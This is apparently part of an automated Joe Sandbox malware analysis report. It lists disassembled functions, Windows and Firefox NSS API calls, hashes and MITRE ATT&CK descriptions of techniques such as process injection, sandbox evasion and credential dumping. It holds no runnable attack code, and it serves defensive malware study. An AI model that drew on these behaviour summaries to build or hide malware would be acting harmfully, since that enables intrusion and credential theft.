Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: f241da6fb0eaf39484bae1ace215f425619a694510306a368843cfa261ded514
Instruction ID: 398a21d83b5987362369ec90abd770abf6cccb6f538e1f1bfbdec07177c6a5bd
Opcode Fuzzy Hash: f241da6fb0eaf39484bae1ace215f425619a694510306a368843cfa261ded514
Instruction Fuzzy Hash: ED019EB1701B029BE710DF69E908757B7E8BF00669B004839D86AC3E00EB36F016CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: fbddb8a4e1c594a933e7f5ec801fcf48d07bcb9d16b4c624cc4eb7c044a53e2b
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: fbddb8a4e1c594a933e7f5ec801fcf48d07bcb9d16b4c624cc4eb7c044a53e2b
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F37
6F@, xrefs: 00416F29

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: 440993b910aec4deeea6f7564bf60b3cb15d7b14a3809c27b2b17703e3e2872f
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: 440993b910aec4deeea6f7564bf60b3cb15d7b14a3809c27b2b17703e3e2872f
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6C9BC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C9BC5AD

Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B

CERT_DecodeCertPackage.NSS3(?,?,6C9BC610,?), ref: 6C9BC5C2

Part of subcall function 6C9BC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9BC0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C9BC5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9BC5EF

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: 99bf3b7ce33ef374376518491d32ccceb79b2b36964b2b085a22e9191c3e7b7f
Instruction ID: da6955fd46d97343f528af077390c7eb015821ef3b733599db1c296b6c12a867
Opcode Fuzzy Hash: 99bf3b7ce33ef374376518491d32ccceb79b2b36964b2b085a22e9191c3e7b7f
Instruction Fuzzy Hash: 4801F2B1E00205BBEB04AB64EC06EBF7B78DB20608F454169EC05AB341F671E919C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9B24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C98C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C98C154,?), ref: 6C9B24FA
PORT_Alloc_Util.NSS3(00000000,?,6C98C154,?), ref: 6C9B2509

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C9B2525
free.MOZGLUE(00000000), ref: 6C9B2532

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: e19d31a39cbc2d68221687180ab60f55a8c7affa6ea4f264b197c39e688e0ea7
Instruction ID: 1670686f3907287d6aad7711648d3aae0a4c0ceda071012132cd1e2274f0cd7f
Opcode Fuzzy Hash: e19d31a39cbc2d68221687180ab60f55a8c7affa6ea4f264b197c39e688e0ea7
Instruction Fuzzy Hash: C0F036B670622637FB1025BA6D59E7739ACDB416F9B240231BD29D66C0D976C80181F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9FAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC2D

Part of subcall function 6C99ADC0: TlsGetValue.KERNEL32(?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE10
Part of subcall function 6C99ADC0: EnterCriticalSection.KERNEL32(?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE24
Part of subcall function 6C99ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C97D079,00000000,00000001), ref: 6C99AE5A
Part of subcall function 6C99ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE6F
Part of subcall function 6C99ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE7F
Part of subcall function 6C99ADC0: TlsGetValue.KERNEL32(?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AEB1
Part of subcall function 6C99ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AEC9

PK11_FreeSymKey.NSS3(?,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC59
free.MOZGLUE(8CB6FF01,6C9D6AC6,6C9E639C,?,?,?,?,?,?,?,?,?,6C9E5D40,00000000,?,6C9EAAD4), ref: 6C9FAC62

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 7f4a4517221c04f28fd54e8a1c7825336c131ea327b21567041a7efed3df8628
Instruction ID: 9d8ef6afbdc1b097c83c6847eb98e751bb369471dca9b897e90b966af66b308b
Opcode Fuzzy Hash: 7f4a4517221c04f28fd54e8a1c7825336c131ea327b21567041a7efed3df8628
Instruction Fuzzy Hash: BB016DB5A002049FDB00DF55E8D0B5677BCEF64B5CF188068E9598F706EB35E849CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9E0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C9E4710,?,000F4240,00000000), ref: 6C9E046B
GetLastError.KERNEL32(?,6C9E4710,?,000F4240,00000000), ref: 6C9E0479

Part of subcall function 6C9FBF80: TlsGetValue.KERNEL32(00000000,?,6C9E461B,-00000004), ref: 6C9FC244

PR_Unlock.NSS3(40C70845,?,6C9E4710,?,000F4240,00000000), ref: 6C9E0492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C9E4710,?,000F4240,00000000), ref: 6C9E04A5

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 00e51fbfb1e558b10497fabb90c7bb185b26a5e8cc8ee7d9d139f81e3cabe1ff
Instruction ID: d3110ac6fb452bd11730e138e0ecfe7bc0d3024119626362d85ec15929f17735
Opcode Fuzzy Hash: 00e51fbfb1e558b10497fabb90c7bb185b26a5e8cc8ee7d9d139f81e3cabe1ff
Instruction Fuzzy Hash: 4FF0B470B003466BEB02AFB69E18B5E32AD9F3520DF44D434E81AC7E91FE21E4459621

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CA6CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CA6CC61
free.MOZGLUE ref: 6CA6CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CA6CC80
free.MOZGLUE(?), ref: 6CA6CC87

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 313c4764560caa2e4260a92e5bf8e19be838de3e0624e872d5dfaa6e6c0ffe9a
Instruction ID: 61aebceb25de774c60b564fadc5c2449229d67b31c337ab8ceb06f60532d5486
Opcode Fuzzy Hash: 313c4764560caa2e4260a92e5bf8e19be838de3e0624e872d5dfaa6e6c0ffe9a
Instruction Fuzzy Hash: 2DE0307670070A9BDA10EFA8DC4489A77ACEE492743154525E691C3700D237F905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3
#F@, xrefs: 004152B1, 004152E1, 004152E4

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: faffdbc4076bd0e333414d0f88bdbb3204a0d781b569a1e069408a4855883834
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: faffdbc4076bd0e333414d0f88bdbb3204a0d781b569a1e069408a4855883834
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6C9B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C9B0DF5
TlsGetValue.KERNEL32 ref: 6C9B0E2D
TlsGetValue.KERNEL32 ref: 6C9B0E58
TlsGetValue.KERNEL32 ref: 6C9B0E84

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: eb85e5a533272dc9b43b985b689c60a59fe84d99295a99998307a0e3cd30e2bd
Instruction ID: b245643ad317866a8006f904dcaf652b4e55ee90c8e306c2cf8c7d2cbeb118f7
Opcode Fuzzy Hash: eb85e5a533272dc9b43b985b689c60a59fe84d99295a99998307a0e3cd30e2bd
Instruction Fuzzy Hash: 3D31E9F06443869BEB045F7CCA4466E77B8BF15348F01A66DE88997A21EB34D486CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C90A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C90A468,00000000), ref: 6C90A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C90A468,00000000), ref: 6C90A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C90A468,?,6C90A468,00000000), ref: 6C90A545
memcpy.VCRUNTIME140(00000001,6C90A468,00000001,?,?,?,6C90A468,00000000), ref: 6C90A57D

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: 383bb17051812dfebb8ec7577971b1c3ef9d4d6c8b0ff68070e06fa8bf643e98
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 5E11DAB3E0031557DB0089BA9C816AF77DDAF55278F280239ED149B780FA35D94886E1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
